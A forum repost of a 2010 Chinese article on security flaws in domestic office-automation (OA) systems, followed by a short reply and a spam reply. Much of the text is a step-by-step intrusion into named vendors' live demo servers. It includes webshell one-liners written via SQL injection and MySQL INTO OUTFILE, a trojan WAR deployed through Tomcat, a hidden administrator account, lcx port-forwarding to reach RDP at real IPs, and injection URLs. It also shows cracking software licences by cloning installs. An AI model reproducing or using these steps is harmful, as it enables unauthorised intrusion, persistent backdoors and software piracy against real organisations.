源码论坛,商业源码下载,尽在锦尚中国商业源码论坛

标题: 国内OA安全现状初探 [打印本页]

作者: w544201314 时间: 2010-9-28 12:40
标题: 国内OA安全现状初探
文章作者：Cschii
[关键字]：OA，J2EE，Servlet，Tomcat应用，克隆
[技术要点]：本文以华天、金和两款OA系统为例，为读者展示安全隐患给OA带来的创伤——不但系统本身被无限制，而且殃及到服务器的安全。并对国内使用比较多的OA，如通达、华天、金和、泛微、致力协同、新思创等作了检测与分析，几乎都存在安全隐患，这使我们不能不为国内OA系统的安全感到担忧。
[主要内容]：

一、突破华天
1、Tocmcat挂马
1）Tomcat基础。简单介绍了Tomcat目录结构、web.xml和Server.xml配置文件的主要元素，以及Tomcat调用Servlet的过程；
2）Tomcat挂马。将jsp木马打包成War文件，然后在Tomcat的管理页面，上传展开（Deploy）该War文件，完成挂马。
War文件，即网络应用程序文件（Web Archive file），一种与平台无关的文件格式，它允许将许多文件组合成一个存档文件，为 J2EE 应用程序创建的 JAR 文件是 EAR 文件（企业 JAR 文件），而War专用在Web方面。
3）Tomcat日志。在Tomcat的日志目录logs中以文本方式保存着Tomcat运行的详细信息，这里我们强调两处。一个是Tomcat启动信息，从中我们可以获取Mysql连接用户密码的Base64加密值，再者就是我们上传War以及访问jsp木马的痕迹也被详细记录。这也启示我们在分析Tomcat日志时，应注意“ [Main] Log in”、“Associated with Deployer”等字符。
2、克隆华天
远程桌面登陆华天OA的Demo服务器，完成华天OA的“克隆”——完整复制OA安装目录！本地安装后再使用update修改administrator的超级用户密码，就这样，我们获得了一个没有功能和时间限制的华天OA系统！

二、无限制金和
1、注入挂马。访http://demos.jh0101.com/ioas选择用户进入系统，找到注入点。
1）Dos命令Echo写马。我们使用XIAOLU的SQL INJ Commander工具（MSSQL注入的命令行工具，稳定速度快），可执行DOS内外部命令比如dir、net、netstat等，Web目录为“d:\IOAS\ioas”，使用echo写一句话木马。
Code:
//echo写一句话木马，使用SQL INJ Commander工具时注意“%”要使用“%25”

echo ^<%25If Request（“#”）^<^>“” Then Execute（Request（“#”））%25^> >d:\ioas\ioas\book\book_xxx.asp

2）PhpMyAdmin写马。金和Demos服务器还使用XAMPP（Apache+MySQL+PHP+PERL建站集成软件包）架设了Apache支持Php，使用81端口，安装目录为“d:\xampp”，web目录为“d:\xampp\ htdocs”。这时我们还可以利用phpmyadmin写一句话木马，因为它连接的Mysql权限一般是很高的。我们利用Dos命令type获得Mysql的连接密码（从php站点jhcrm_zm的连接文件config.inc.php或phpmyadmin配置文件的config.inc.php获得）。然后登陆到PhpMyAdmin，选择一个数据库，执行Sql语句写php一句话木马。
Code:
//利用MySql语句写php一句话木马

select '' into outfile 'd:\\xampp\\htdocs\\jhqe.php'

2、内网渗透。利用华天Demo服务器作为跳板连接金和Demos服务器（lcx.exe已上传，3389已开启，并且已添加管理员用户，命令“net user $jhoa jhoa /add”、“net localgroup administrators $jhoa /add”），基本数据如下：
Code:
localgroup administrators $jhoa /add“），基本数据如下：
服务器 IP Lcx.exe存放路径连接方向端口
demo.oa8000.com 211.144.133.246 D:\htoa\tomcat\bin\lcx.exe 本地 5555
demos.jh0101.com 211.88.14.232 D:\tools\win2003\I386\lcx.exe 远程 3389
分别执行如下命令：
Code:
//在jh0101服务器上利用WebShell执行：把远程端口3389转发到本地44端口

D:\tools\win2003\I386\lcx.exe -slave 211.144.133.246 44 211.88.14.232 3389

//在oa8000服务器（本地）上执行：监听44端口并转发到5555端口，如图29

D:\htoa\tomcat\bin\lcx.exe -listen 44 5555

当提示”Waiting another Client on port:5555…“，说明远程IP已成功连接到本地44端口，并在5555端口等待连接，这时即可使用远程桌面连接”127.0.0.1:5555“，成功连接到远程金和Demos服务器的3389端口
注意：lcx运行后不会自动终止，以便我们在本地可以随时连接，但是这样做太明目张胆了，而且一旦使用SQL INJ Commander创建了一个lcx进程后，再次使用该工具时将出错，所以使用后应该及时终止lcx进程。首先我们使用”tasklist /svc“获得lcx进程的PID，然后使用”taskkill /pid 340 /f“强行终止lcx进程。3、注入其他Web服务器，或者利用扫描器、嗅探器等工具进行更深入的渗透。
4、克隆金和。复制金和GOA目录、备份JHGOA数据库，下载到本地，架设IIS、恢复数据库，完成对金和OA的克隆。注意：金和使用MSSQL内置函数pwdencrypt加密密码。

三、其他OA

1、新思创。官方网站www.gotooa.com，演示网址http://5000demo.systron.net.cn，试用用户名及密码：guest。安全问题：几乎未作任何过滤，存在严重注入！！官网下载试用版本，使用DeZender开源Php文件，我们直接分析htmledit\include\upload.php文件，发现没有对文件类型进行限制！而且没有认证用户！看来无需登陆就可以直接上传Php文件，汗。直接请求http://5000demo.systron.net.cn/htmledit/include/upload.php”，另存源码为html文件，修改表单的action并增加提交按钮，上传，查看页面源码获得Php木马地址。

2、通达。官方网站www.tongda2000.com，演示网址http://oa.tongda2000.com:81，Php语言，存在数字型注入，可以爆出Sql语句和绝对路径，但是magic_quotes_gpc开启。使用%01—%19（除%09、%0a、%0c、%0d）范围的任一个字符绕过空格，构造union语句注出管理员的密码（采用Mysql的crypt函数加密，有能力和兴趣的读者可以尝试无限制）。

3、致力协同。官方网站www.xtoa.cn，在线试用入口http://www.xtoa.cn/usetest.html，使用Jsp语言。为了人性化，协同在OA的登陆页面设计了“电子公告”和“最新动态”，遗憾的是却存在漏洞！问题应该是严重的，因为无需登陆便可注入！
Code:

http://219.144.222.100:8080/XTOA ... 0union%20select%201,2,3,4,5%20from%20QJUserInfo

4、泛微。官方网站www.weaver.com.cn，标准版演示http://www.weaver.com.cn/eoffice/index.html，Php语言，几乎变量都未作任何过滤。

Web安全一直是动态网站不可摆脱的心痛，在经历了这些年风雨之后，随着大家安全意识的加强，逐步得到了改善，这足以令人欣喜。但是作为信息化的必然产物——OA（Office Automation，办公自动化）系统还仅处于发展的初级阶段，其概念、标准、规范还不够统一和完善，当大家都疲于完善改进功能设计时，就很难顾及系统的安全性能，就像初学代码编写，首先考虑是功能，然后才是性能。对于OA，目前尚没有比较权威的测评标准与结果，大家仁者见仁，智者见智。作为事物的发展初期，这是在所难免的，像CMS系统发展至今，也很难评价出谁优谁劣。但是国内OA安全现状必须引起我们的高度重视，OA系统的使用者和研发者！只有这样才能构筑起一道更安全的网络防线。

作者: loverp 时间: 2010-9-28 14:15
不错!学习一下!

作者: hungchia 时间: 2011-7-22 01:17
桐乡外卖网 http://www.txwaimai.com
嘉兴外卖网 http://www.jxwaimai.com
嘉兴交友网 http://www.jxyuan.com
绵阳房产网 http://www.myfcw.cn
禾城主机 http://www.cn0573.net
嘉兴QQ群 http://qqun.cn0573.net
桐乡做网站 http://im.cn0573.net

欢迎光临源码论坛,商业源码下载,尽在锦尚中国商业源码论坛 (https://bbs.52jscn.com/)